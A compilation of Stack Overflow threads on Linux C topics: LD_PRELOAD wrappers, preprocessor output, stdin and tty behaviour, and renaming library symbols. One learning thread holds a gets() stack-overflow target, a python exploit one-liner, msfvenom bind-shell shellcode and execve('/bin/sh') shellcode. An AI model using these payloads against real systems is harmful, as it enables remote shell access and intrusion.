LD_PRELOAD-ed open() + __xstat() + syslog() result into EBADF - c

I am on a Fedora 30 box with GLIBC 2.29 and kernel 5.2.18-200.fc30.x86_64
$ rpm -qf /usr/lib64/libc.so.6
glibc-2.29-28.fc30.x86_64
override.c :
#define open Oopen
#define __xstat __Xxstat
#define _GNU_SOURCE
#include <dlfcn.h>
#include <stdio.h>
#include <sys/stat.h>
#include <syslog.h>
#include <errno.h>
#undef open
#undef __xstat
#ifndef DEBUG
#define DEBUG 1
#endif
#define LOG(fmt, ...) \
do { \
if (DEBUG) { \
int errno_ = errno; \
/* fprintf(stderr, "override|%s: " fmt, __func__, __VA_ARGS__); */ \
syslog(LOG_INFO | LOG_USER, "override|%s: " fmt, __func__, __VA_ARGS__); \
errno = errno_; \
} \
} while (0)
/* Function pointers to hold the value of the glibc functions */
static int (*real_open)(const char *str, int flags, mode_t mode);
static int (*real___xstat)(int ver, const char *str, struct stat *buf);
int open(const char *str, int flags, mode_t mode) {
LOG("%s\n", str);
real_open = dlsym(RTLD_NEXT, __func__);
return real_open(str, flags, mode);
}
int __xstat(int ver, const char *str, struct stat *buf) {
LOG("%s\n", str);
real___xstat = dlsym(RTLD_NEXT, __func__);
return real___xstat(ver, str, buf);
}
It works in all cases I could think of, but not this one:
$ gcc -DDEBUG=1 -fPIC -shared -o liboverride.so override.c -ldl -Wall -Wextra -Werror
$ LD_PRELOAD=$PWD/liboverride.so bash -c "echo blah | xargs -I{} sh -c 'echo {} | rev'"
rev: stdin: Bad file descriptor
However, if I comment out syslog() in favour of fprintf(), it works:
$ gcc -DDEBUG=1 -fPIC -shared -o liboverride.so override.c -ldl -Wall -Wextra -Werror
$ LD_PRELOAD=$PWD/liboverride.so bash -c "echo blah | xargs -I{} sh -c 'echo {} | rev'"
override|open: /dev/tty
override|__xstat: /tmp/nwani_1587079071
override|__xstat: .
...
... yada ...
... yada ...
... yada ...
...
halb <----------------------------- !
...
... yada ...
... yada ...
... yada ...
override|__xstat: /usr/share/terminfo
So, my dear friends, how do I debug why using syslog() results into a EBADF?
=========================================================================
Updates:
Unable to reproduce on Fedora 32-beta
The following command also reproduces the same problem:
$ LD_PRELOAD=$PWD/liboverride.so bash -c "echo blah | xargs -I{} sh -c 'echo {} | cat'"
Interestingly, if I replace cat with /usr/bin/cat the problem goes away.
=========================================================================
Update: Based on Carlos's answer, I ran a git bisect on findutils (xargs) and found that my scenario was (unintentionally?) fixed with a feature addition:
commit 40cd25147b4461979c0d992299f2c101f9034f7a
Author: Bernhard Voelker <mail#bernhard-voelker.de>
Date: Tue Jun 6 08:19:29 2017 +0200
xargs: add -o, --open-tty option
This option is available in the xargs implementation of FreeBSD, NetBSD,
OpenBSD and in the Apple variant. Add it for compatibility.
* xargs/xargs.c (open_tty): Add static flag for the new option.
(longopts): Add member.
(main): Handle the 'o' case in the getopt_long() loop.
(prep_child_for_exec): Redirect stdin of the child to /dev/tty when
the -o option is given. Furthermore, move the just-opened file
descriptor to STDIN_FILENO.
(usage): Document the new option.
* bootstrap.conf (gnulib_modules): Add dup2.
* xargs/xargs.1 (SYNOPSIS): Replace the too-long list of options by
"[options]" - they are listed later anyway.
(OPTIONS): Document the new option.
(STANDARDS CONFORMANCE): Mention that the -o option is an extension.
* doc/find.texi (xargs options): Document the new option.
(Invoking the shell from xargs): Amend the explanation of the
redirection example with a note about the -o option.
(Viewing And Editing): Likewise.
(Error Messages From xargs): Add the message when dup2() fails.
(NEWS): Mention the new option.
Fixes http://savannah.gnu.org/bugs/?51151

Your overriden open and __xstat must not have any side-effects that can be seen by the running process.
No process expects open or __xstat to close and reopen the lowest numbered file descriptor, nor that it should be opened O_CLOEXEC, but this is indeed what syslog does if it finds that the logging socket has failed.
The solution is that you must call closelog after calling syslog to avoid any side-effects becoming visible to the process.
The failure scenario looks like this:
xargs closes stdin.
xargs calls open or stat.
liboverride.so's logging calls syslog which opens a socket, and gets fd 0 as the socket fd.
xargs calls fork.
xargs calls dup2 to dup the right piped fd to stdin, and so overwrites fd 0 with the new stdin (the expectation is that nothing else could have opened fd 0)
xargs is about to call execve but...
xargs calls stat just before execve
liboverride.so's logging calls syslog and the implementation detects the sendto has failed, closes fd 0, and reopens fd 0 as the socket fd with O_CLOEXEC and logs a message.
xargs calls execve to run rev and the O_CLOEXEC socket fd, fd 0, is closed.
rev expects fd 0 to be stdin, but it is closed and so fails to read from it and writes an error message to that effect on stdout (which is still valid).
When you write wrappers you must take care to avoid such side-effects. In this case it's relatively easy to use closelog, but that may not always be the case.
Depending on your version of xargs there may be more or less work done between the fork and exec and so it may work if liboverride.os's logging function is not called before the exec.

Related

How to show 'preprocessed' code ignoring includes with GCC

I'd like to know if it's possible to output 'preprocessed' code wit gcc but 'ignoring' (not expanding) includes:
ES I got this main:
#include <stdio.h>
#define prn(s) printf("this is a macro for printing a string: %s\n", s);
int int(){
char str[5] = "test";
prn(str);
return 0;
}
I run gcc -E main -o out.c
I got:
/*
all stdio stuff
*/
int int(){
char str[5] = "test";
printf("this is a macro for printing a string: %s\n", str);
return 0;
}
I'd like to output only:
#include <stdio.h>
int int(){
char str[5] = "test";
printf("this is a macro for printing a string: %s\n", str);
return 0;
}
or, at least, just
int int(){
char str[5] = "test";
printf("this is a macro for printing a string: %s\n", str);
return 0;
}
PS: would be great if possible to expand "local" "" includes and not to expand "global" <> includes
I agree with Matteo Italia's comment that if you just prevent the #include directives from being expanded, then the resulting code won't represent what the compiler actually sees, and therefore it will be of limited use in troubleshooting.
Here's an idea to get around that. Add a variable declaration before and after your includes. Any variable that is reasonably unique will do.
int begin_includes_tag;
#include <stdio.h>
... other includes
int end_includes_tag;
Then you can do:
> gcc -E main -o out.c | sed '/begin_includes_tag/,/end_includes_tag/d'
The sed command will delete everything between those variable declarations.
When cpp expands includes it adds # directives (linemarkers) to trace back errors to the original files.
You can add a post processing step (it can be trivially written in any scripting language, or even in C if you feel like it) to parse just the linemarkers and filter out the lines coming from files outside of your project directory; even better, one of the flags (3) marks system header files (stuff coming from paths provided through -isystem, either implicitly by the compiler driver or explicitly), so that's something you could exploit as well.
For example in Python 3:
#!/usr/bin/env python3
import sys
skip = False
for l in sys.stdin:
if not skip:
sys.stdout.write(l)
if l.startswith("# "):
toks = l.strip().split(" ")
linenum, filename = toks[1:3]
flags = toks[3:]
skip = "3" in flags
Using gcc -E foo.c | ./filter.py I get
# 1 "foo.c"
# 1 "<built-in>"
# 1 "<command-line>"
# 31 "<command-line>"
# 1 "/usr/include/stdc-predef.h" 1 3 4
# 1 "foo.c"
# 1 "/usr/include/stdio.h" 1 3 4
# 4 "foo.c"
int int(){
char str[5] = "test";
printf("this is a macro for printing a string: %s\n", str);;
return 0;
}
Protect the #includes from getting expanded, run the preprocessor textually, remove the # 1 "<stdint>" etc. junk the textual preprocessor generates and reexpose the protected #includes.
This shell function does it:
expand_cpp(){
sed 's|^\([ \t]*#[ \t]*include\)|magic_fjdsa9f8j932j9\1|' "$#" \
| cpp | sed 's|^magic_fjdsa9f8j932j9||; /^# [0-9]/d'
}
as long as you keep the include word together instead of doing crazy stuff like
#i\
ncl\
u??/
de <iostream>
(above you can see 2 backslash continuation lines + 1 trigraph (??/ == \ ) backslash continuation line).
If you wish, you can protect #ifs #ifdefs #ifndefs #endifs and #elses the same way.
Applied to your example
example.c:
#include <stdio.h>
#define prn(s) printf("this is a macro for printing a string: %s\n", s);
int int(){
char str[5] = "test";
prn(str);
return 0;
}
like as with expand_cpp < example.c or expand_cpp example.c, it generates:
#include <stdio.h>
int int(){
char str[5] = "test";
printf("this is a macro for printing a string: %s\n", str);;
return 0;
}
You can use -dI to show the #include directives and post-process the preprocessor output.
Assuming the name of your your file is foo.c
SOURCEFILE=foo.c
gcc -E -dI "$SOURCEFILE" | awk '
/^# [0-9]* "/ { if ($3 == "\"'"$SOURCEFILE"'\"") show=1; else show=0; }
{ if(show) print; }'
or to suppress all # line_number "file" lines for $SOURCEFILE:
SOURCEFILE=foo.c
gcc -E -dI "$SOURCEFILE" | awk '
/^# [0-9]* "/ { ignore = 1; if ($3 == "\"'"$SOURCEFILE"'\"") show=1; else show=0; }
{ if(ignore) ignore=0; else if(show) print; }'
Note: The AWK scripts do not work for file names that include whitespace. To handle file names with spaces you could modify the AWK script to compare $0 instead of $3.
supposing the file is named c.c :
gcc -E c.c | tail -n +`gcc -E c.c | grep -n -e "#*\"c.c\"" | tail -1 | awk -F: '{print $1}'`
It seems # <number> "c.c" marks the lines after each #include
Of course you can also save gcc -E c.c in a file to not do it two times
The advantage is to not modify the source nor to remove the #include before to do the gcc -E, that just removes all the lines from the top up to the last produced by an #include ... if I am right
Many previous answers went in the direction of using the tracing # directives.
It's actually a one-liner in classical Unix (with awk):
gcc -E file.c | awk '/# [1-9][0-9]* "file.c"/ {skip=0; next} /# [1-9][0-9]* ".*"/ {skip=1} (skip<1) {print}'
TL;DR
Assign file name to fname and run following commands in shell. Throughout this ansfer fname is assumed to be sh variable containing the source file to be processed.
fname=file_to_process.c ;
grep -G '^#include' <./"$fname" ;
grep -Gv '^#include[ ]*<' <./"$fname" | gcc -x c - -E -o - $(grep -G '^#include[ ]*<' <./"$fname" | xargs -I {} -- expr "{}" : '#include[ ]*<[ ]*\(.*\)[ ]*>' | xargs -I {} printf '-imacros %s ' "{}" ) | grep -Ev '^([ ]*|#.*)$'
All except gcc here is pure POSIX sh, no bashisms, or nonportable options. First grep is there to output #include directives.
GCC's -imacros
From gcc documentation:
-imacros file: Exactly like ‘-include’, except that any output produced by scanning file is
thrown away. Macros it defines remain defined. This allows you to acquire all
the macros from a header without also processing its declarations
So, what is -include anyway?
-include file: Process file as if #include "file" appeared as the first line of the primary
source file. However, the first directory searched for file is the preprocessor’s
working directory instead of the directory containing the main source file. If
not found there, it is searched for in the remainder of the #include "..."
search chain as normal.
Simply speaking, because you cannot use <> or "" in -include directive, it will always behave as if #include <file> were in source code.
First approach
ANSI C guarantees assert to be macro, so it is perfect for simple test:
printf 'int main(){\nassert(1);\nreturn 0;}\n' | gcc -x c -E - -imacros assert.h.
Options -x c and - tells gcc to read source file from stdin and that the language used is C. Output doesn't contain any declarations from assert.h, but there is still mess, that can be cleaned up with grep:
printf 'int main(){\nassert(1);\nreturn 0;}\n' | gcc -x c -E - -imacros assert.h | grep -Ev '^([ ]*|#.*)$'
Note: in general, gcc won't expand tokens that intended to be macros, but the definition is missing. Nevertheless assert happens to expand entirely: __extension__ is compiler option, __assert_fail is function, and __PRETTY_FUNCTION__ is string literal.
Automatisation
Previous approach works, but it can be tedious;
each #include needs to be deleted from file manually, and
it has to be added to gcc call as -imacros's argument.
First part is easy to script: pipe grep -Gv '^#include[ ]*<' <./"$fname" to gcc.
Second part takes some exercising (at least without awk):
2.1 Drop -v negative matching from previous grep command: grep -G '^#include[ ]*<' <./"$fname"
2.2 Pipe previous to expr inside xarg to extract header name from each include directive: xargs -I {} -- expr "{}" : '#include[ ]*<[ ]*\(.*\)[ ]*>'
2.3 Pipe again to xarg, and printf with -imacros prefix: xargs -I {} printf '-imacros %s ' "{}"
2.4 Enclose all in command substitution "$()" and place inside gcc.
Done. This is how you end up with the lengthy command from the beginning of my answer.
Solving subtle problems
This solution still has flaws; if local header files themselves contains global ones, these global will be expanded. One way to solve this problem is to use grep+sed to transfer all global includes from local files and collect them in each *.c file.
printf '' > std ;
for header in *.h ; do
grep -G '^#include[ ]*<' <./$header >> std ;
sed -i '/#include[ ]*</d' $header ;
done;
for source in *.c ; do
cat std > tmp;
cat $source >> tmp;
mv -f tmp $source ;
done
Now the processing script can be called on any *.c file inside pwd without worry, that anything from global includes would leak into. The final problem is duplication. Local headers including themselves local includes might be duplicated, but this could occur only, when headers aren't guarded, and in general every header should be always guarded.
Final version and example
To show these scripts in action, here is small demo:
File h1.h:
#ifndef H1H
#define H1H
#include <stdio.h>
#include <limits.h>
#define H1 printf("H1:%i\n", h1_int)
int h1_int=INT_MAX;
#endif
File h2.h:
#ifndef H2H
#define H2H
#include <stdio.h>
#include "h1.h"
#define H2 printf("H2:%i\n", h2_int)
int h2_int;
#endif
File main.c:
#include <assert.h>
#include "h1.h"
#include "h2.h"
int main(){
assert(1);
H1;
H2;
}
Final version of the script preproc.sh:
fname="$1"
printf '' > std ;
for source in *.[ch] ; do
grep -G '^#include[ ]*<' <./$source >> std ;
sed -i '/#include[ ]*</d' $source ;
sort -u std > std2;
mv -f std2 std;
done;
for source in *.c ; do
cat std > tmp;
cat $source >> tmp;
mv -f tmp $source ;
done
grep -G '^#include[ ]*<' <./"$fname" ;
grep -Gv '^#include[ ]*<' <./"$fname" | gcc -x c - -E -o - $(grep -G '^#include[ ]*<' <./"$fname" | xargs -I {} -- expr "{}" : '#include[ ]*<[ ]*\(.*\)[ ]*>' | xargs -I {} printf '-imacros %s ' "{}" ) | grep -Ev '^([ ]*|#.*)$'
Output of the call ./preproc.sh main.c:
#include <assert.h>
#include <limits.h>
#include <stdio.h>
int h1_int=0x7fffffff;
int h2_int;
int main(){
((void) sizeof ((
1
) ? 1 : 0), __extension__ ({ if (
1
) ; else __assert_fail (
"1"
, "<stdin>", 4, __extension__ __PRETTY_FUNCTION__); }))
;
printf("H1:%i\n", h1_int);
printf("H2:%i\n", h2_int);
}
This should always compile. If you really want to print every #include "file", then delete < from grep pattern '^#include[ ]*<' in 16-th line of preproc.sh`, but be warned, that content of headers will then be duplicated, and code might fail, if headers contain initialisation of variables. This is purposefully the case in my example to address the problem.
Summary
There are plenty of good answers here so why yet another? Because this seems to be unique solution with following properties:
Local includes are expanded
Global included are discarded
Macros defined either in local or global includes are expanded
Approach is general enough to be usable not only with toy examples, but actually in small and medium projects that reside in a single directory.

Exploit Development - GETS and Shellcode

Trying to learn more about exploit dev and building shellcodes, but ran into an issue I don't understand the reason behind.
Why am I not able to run a shellcode such as execve("/bin/sh") and spawn a shell I can interact with?
While on the other hand, I'm able to create a reverse / bind_tcp shell and connect to it with netcat.
Sample program:
// gcc vuln.c -o vuln -m32 -fno-stack-protector -z execstack
#include <stdio.h>
#include <string.h>
void test() {
char pass[50];
printf("Password: ");
gets(pass);
if (strcmp(pass, "epicpassw0rd") == 0) {
printf("Woho, you got it!\n");
}
}
int main() {
test();
__asm__("movl $0xe4ffd4ff, %edx"); // jmp esp, call esp - POC
return(0);
}
Sample Exploit:
python -c "print 'A'*62 + '\x35\x56\x55\x56' + 'PAYLOAD'" | ./vuln
Sample Payload (working):
msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 LHOST="0.0.0.0" -f python
\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
Tested multiple different execve("/bin/sh") samples, as well as creating my own, then compiled them to verify they work before using it as payload.
Such as: https://www.exploit-db.com/exploits/42428/
When the shellcode execve(/bin/sh) executes, it has no connected standard input (because of GETS) and will terminate.
The solution is to close stdin descriptor, reopen /dev/tty before executing /bin/sh.
#include <unistd.h>
#include <stdio.h>
#include <sys/fcntl.h>
int main(void) {
char buf[50];
gets(buf);
printf("Yo %s\n", buf);
close(0);
open("/dev/tty", O_RDWR | O_NOCTTY);
execve ("/bin/sh", NULL, NULL);
}
Related answer: execve("/bin/sh", 0, 0); in a pipe
It is also possible to execute the payload by using
( python -c "print 'A'*62 + '\x35\x56\x55\x56' + '\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'"; cat ) | ./vuln

Bash reopen tty on simple program

#include <stdio.h>
#include <stdlib.h>
int main()
{
char buf[512];
fgets(buf, 512, stdin);
system("/bin/sh");
}
Compile with cc main.c
I would like a one-line command that makes this program run ls without it waiting for user input.
# This does not work - it prints nothing
(echo ; echo ls) | ./a.out
# This does work if you type ls manually
(echo ; cat) | ./a.out
I'm wondering:
Why doesn't the first example work?
What command would make the program run ls, without changing the source?
My question is shell and OS-agnostic but I would like it to work at least on bash 4.
Edit:
While testing out the answers, I found out that this works.
(python -c "print ''" ; echo ls) | ./a.out
Using strace:
$ (python -c "print ''" ; echo ls) | strace ./a.out
...
read(0, "\n", 4096)
...
This also works:
(echo ; sleep 0.1; echo ls) | ./a.out
It seems like the buffering is ignored. Is this due to the race condition?
strace shows what's going on:
$ ( echo; echo ls; ) | strace ./foo
[...]
read(0, "\nls\n", 4096) = 4
[...]
clone(child_stack=NULL, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0x7ffdefc88b9c) = 9680
In other words, your program reads a whole 4096 byte buffer that includes both lines before it runs your shell. It's fine interactively, because by the time the read happens, there's only one line in the pipe buffer, so over-reading is not possible.
You instead need to stop reading after the first \n, and the only way to do that is to read byte by byte until you hit it. I don't know libc well enough to know if this kind of functionality is supported, but here it is with read directly:
#include <unistd.h>
#include <stdlib.h>
int main()
{
char buf[1];
while((read(0, buf, 1)) == 1 && buf[0] != '\n');
system("/bin/sh");
}

avoid LD_PRELOAD: Wrap library and provide functionality requested from libc

I have a shared library, say somelib.so, which uses ioctl from libc (according to objdump).
My goal is to write a new library that wraps around somelib.so and provides a custom ioctl. I want to avoid preloading a library to ensure that only the calls in somelib.so use the custom ioctl.
Here is my current snippet:
typedef int (*entryfunctionFromSomelib_t) (int par, int opt);
typedef int (*ioctl_t) (int fd, int request, void *data);
ioctl_t real_ioctl = NULL;
int ioctl(int fd, int request, void *data )
{
fprintf( stderr, "trying to wrap ioctl\n" );
void *handle = dlopen( "libc.so.6", RTLD_NOW );
if (!handle)
fprintf( stderr, "Error loading libc.so.6: %s\n", strerror(errno) );
real_ioctl = (ioctl_t) dlsym( handle, "ioctl" );
return real_ioctl( fd, request, data);
}
int entryfunctionFromSomelib( int par, int opt ) {
void *handle = dlopen( "/.../somelib.so", RTLD_NOW );
if (!handle)
fprintf( stderr, "Error loading somelib.so: %s\n", strerror(errno) );
real_entryfunctionFromSomelib = entryfunctionFromSomelib_t dlsym( handle, "entryfunctionFromSomelib" );
return real_entryfunctionFromSomelib( par, opt );
}
However, it does not in work in the sense that the calls to ioctl form somelib.so are not redirected to my custom ioctl implementation. How can I enforce that the wrapped somelib.so does so?
======================
Additional information added after #Nominal Animal post:
Here some information from mylib.so (somelib.so after edit) obtained via readelf -s | grep functionname:
246: 0000000000000000 121 FUNC GLOBAL DEFAULT UND dlsym#GLIBC_2.2.5 (11)
42427: 0000000000000000 121 FUNC GLOBAL DEFAULT UND dlsym##GLIBC_2.2.5
184: 0000000000000000 37 FUNC GLOBAL DEFAULT UND ioctl#GLIBC_2.2.5 (6)
42364: 0000000000000000 37 FUNC GLOBAL DEFAULT UND ioctl##GLIBC_2.2.5
After 'patching' mylib.so it also shows the new function as:
184: 0000000000000000 37 FUNC GLOBAL DEFAULT UND iqct1#GLIBC_2.2.5 (6)
I 'versioned' and exported the symbols from my wrap_mylib library for which readelf now shows:
25: 0000000000000d15 344 FUNC GLOBAL DEFAULT 12 iqct1#GLIBC_2.2.5
63: 0000000000000d15 344 FUNC GLOBAL DEFAULT 12 iqct1#GLIBC_2.2.5
However, when I try to dlopen wrap_mylib I get the following error:
symbol iqct1, version GLIBC_2.2.5 not defined in file libc.so.6 with link time reference
Is that maybe because mylib.so tries to dlsym iqct1 from libc.so.6 ?
If binutils' objcopy could modify dynamic symbols, and the mylib.so is an ELF dynamic library, we could use
mv mylib.so old.mylib.so
objcopy --redefine-sym ioctl=mylib_ioctl old.mylib.so mylib.so
to rename the symbol name in the library from ioctl to mylib_ioctl, so we could implement
int mylib_ioctl(int fd, int request, void *data);
in another library or object linked to the final binaries.
Unfortunately, this feature is not implemented (as of early 2017 at least).
We can solve this using an ugly hack, if the replacement symbol name is exactly the same length as the original name. The symbol name is a string (both preceded and followed by a nul byte) in the ELF file, so we can just replace it using e.g. GNU sed:
LANG=C LC_ALL=C sed -e 's|\x00ioctl\x00|\x00iqct1\x00|g' old.mylib.so > mylib.so
This replaces the name from ioctl() to iqct1(). It is obviously less than optimal, but it seems the simplest option here.
If you find you need to add version information to the iqct1() function you implement, with GCC you can simply add a line similar to
__asm__(".symver iqct1,iqct1#GLIBC_2.2.5");
where the version follows the # character.
Here is a practical example, showing how I tested this in practice.
First, let's create mylib.c, representing the sources for mylib.c (that the OP does not have -- otherwise just altering the sources and recompiling the library would solve the issue):
#include <unistd.h>
#include <errno.h>
int myfunc(const char *message)
{
int retval = 0;
if (message) {
const char *end = message;
int saved_errno;
ssize_t n;
while (*end)
end++;
saved_errno = errno;
while (message < end) {
n = write(STDERR_FILENO, message, (size_t)(end - message));
if (n > 0)
message += n;
else {
if (n == -1)
retval = errno;
else
retval = EIO;
break;
}
}
errno = saved_errno;
}
return retval;
}
The only function exported is myfunc(message), as declared in mylib.h:
#ifndef MYLIB_H
#define MYLIB_H
int myfunc(const char *message);
#endif /* MYLIB_H */
Let's compile the mylib.c into a dynamic shared library, mylib.so:
gcc -Wall -O2 -fPIC -shared mylib.c -Wl,-soname,libmylib.so -o mylib.so
Instead of write() from the C library (it's a POSIX function just like ioctl(), not a standard C one), we wish to use mywrt() of our own design in our own program. The above command saves the original library as mylib.so (while naming it internally as libmylib.so), so we can use
sed -e 's|\x00write\x00|\x00mywrt\x00|g' mylib.so > libmylib.so
to alter the symbol name, saving the modified library as libmylib.so.
Next, we need a test executable, that provides the ssize_t mywrt(int fd, const void *buf, size_t count); function (the prototype being the same as the write(2) function it replaces. test.c:
#include <stdlib.h>
#include <stdio.h>
#include "mylib.h"
ssize_t mywrt(int fd, const void *buffer, size_t bytes)
{
printf("write(%d, %p, %zu);\n", fd, buffer, bytes);
return bytes;
}
__asm__(".symver mywrt,mywrt#GLIBC_2.2.5");
int main(void)
{
myfunc("Hello, world!\n");
return EXIT_SUCCESS;
}
The .symver line specifies version GLIBC_2.2.5 for mywrt.
The version depends on the C library used. In this case, I ran objdump -T $(locate libc.so) 2>/dev/null | grep -e ' write$', which gave me
00000000000f66d0 w DF .text 000000000000005a GLIBC_2.2.5 write
the second to last field of which is the version needed.
Because the mywrt symbol needs to be exported for the dynamic library to use, I created test.syms:
{
mywrt;
};
To compile the test executable, I used
gcc -Wall -O2 test.c -Wl,-dynamic-list,test.syms -L. -lmylib -o test
Because libmylib.so is in the current working directory, we need to add current directory to the dynamic library search path:
export LD_LIBRARY_PATH=$PWD:$LD_LIBRARY_PATH
Then, we can run our test binary:
./test
It will output something like
write(2, 0xADDRESS, 14);
because that's what the mywrt() function does. If we want to check the unmodified output, we can run mv -f mylib.so libmylib.so and rerun ./test, which will then output just
Hello, world!
This shows that this approach, although depending on very crude binary modification of the shared library file (using sed -- but only because objcopy does not (yet) support --redefine-sym on dynamic symbols), should work just fine in practice.
This is also a perfect example of how open source is superior to proprietary libraries: the amount of effort already spent in trying to fix this minor issue is at least an order of magnitude higher than it would have been to rename the ioctl call in the library sources to e.g. mylib_ioctl(), and recompile it.
Interposing dlsym() (from <dlfcn.h>, as standardized in POSIX.1-2001) in the final binary seems necessary in OP's case.
Let's assume the original dynamic library is modified using
sed -e 's|\x00ioctl\x00|\x00iqct1\x00|g;
s|\x00dlsym\x00|\x00d15ym\x00|g;' mylib.so > libmylib.so
and we implement the two custom functions as something like
int iqct1(int fd, unsigned long request, void *data)
{
/* For OP to implement! */
}
__asm__(".symver iqct1,iqct1#GLIBC_2.2.5");
void *d15ym(void *handle, const char *symbol)
{
if (!strcmp(symbol, "ioctl"))
return iqct1;
else
if (!strcmp(symbol, "dlsym"))
return d15ym;
else
return dlsym(handle, symbol);
}
__asm__(".symver d15ym,d15ym#GLIBC_2.2.5");
Do check the versions correspond to the C library you use. The corresponding .syms file for the above would contain just
{
i1ct1;
d15ym;
};
otherwise the implementation should be as in the practical example shown earlier in this answer.
Because the actual prototype for ioctl() is int ioctl(int, unsigned long, ...);, there are no quarantees that this will work for all general uses of ioctl(). In Linux, the second parameter is of type unsigned long, and the third parameter is either a pointer or a long or unsigned long -- in all Linux architectures pointers and longs/unsigned longs have the same size --, so it should work, unless the driver implementing the ioctl() is also closed, in which case you are simply hosed, and limited to either hoping this works, or switching to other hardware with proper Linux support and open-source drivers.
The above special-cases both original symbols, and hard-wires them to the replaced functions. (I call these replaced instead of interposed symbols, because we really do replace the symbols the mylib.so calls with these ones, rather than interpose calls to ioctl() and dlsym().)
It is a rather brutish approach, but aside from using sed due to the lack of dynamic symbol redefinition support in objcopy, it is quite robust and clear as to what is done and what actually happens.

Why does using pipes with `who` cause mom not to like me?

In a program I'm writing, I fork() and execl() do determine who mom likes. I noticed that if I set up pipes to write to who's stdin, it produces no output. If I don't set up pipes to write to stdin, then who produces output as normal. (yes, I know, writing to who's stdin is pointless; it was residual code from executing other processes that made me discover this).
Investigating this, I wrote this simple program (edit: for a simpler example, just run: true | who mom likes):
$ cat t.c:
#include <unistd.h>
#include <assert.h>
int main()
{
int stdin_pipe[2];
assert( pipe(stdin_pipe) == 0);
assert( dup2(stdin_pipe[0], STDIN_FILENO) != -1);
assert( close(stdin_pipe[0]) == 0);
assert( close(stdin_pipe[1]) == 0);
execl("/usr/bin/who", "/usr/bin/who", "mom", "likes", (char*)NULL);
return 0;
}
Compiling and running results in no output, which is what surprised me initially:
$ cc t.c
$ ./a.out
$
However, if I compile with -DNDEBUG (to remove the piping work in the assert()s) and run, it works:
$ cc -DNDEBUG t.c
$ ./a.out
batman pts/0 2014-08-15 12:57 (:0)
$
As soon as I call dup2(stdin_pipe[0], STDIN_FILENO), who stops producing output. The only explanation I could come up with is that dup2 affects the tty, and who uses the tty do determine who I am (given the -m flag prints "only hostname and user associated with stdin"). My main question is:
Why can't who mom likes/who am i/who -m determine who I am when I give it a pipe for stdin? What mechanism is it using to determine its information, and why does using a pipe ruin this mechanism? I know it's using stdin somehow, but I don't understand exactly how or exactly why stdin being a pipe matters.
Let's look at the source code for GNU coreutils who:
if (my_line_only)
{
ttyname_b = ttyname (STDIN_FILENO);
if (!ttyname_b)
return;
if (STRNCMP_LIT (ttyname_b, DEV_DIR_WITH_TRAILING_SLASH) == 0)
ttyname_b += DEV_DIR_LEN; /* Discard /dev/ prefix. */
}
When -m (my_line_only) is used, who finds the tty device connected to stdin, and then proceeds to finds the entry for that tty in utmp.
When stdin is not a terminal, there is no name to look up in utmp, so it exits without printing anything.

Resources